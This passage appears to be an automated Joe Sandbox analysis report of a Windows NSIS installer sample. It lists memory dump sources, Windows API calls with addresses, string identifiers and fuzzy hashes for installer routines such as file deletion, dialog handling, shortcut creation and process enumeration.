                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429574,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                      • String ID: F$A
                                                                                                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429574,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00429574,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                      • API String ID: 542301482-1377821865
                                                                                                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                      • API String ID: 20674999-2124804629
                                                                                                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                      • String ID: F$N$open
                                                                                                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B79
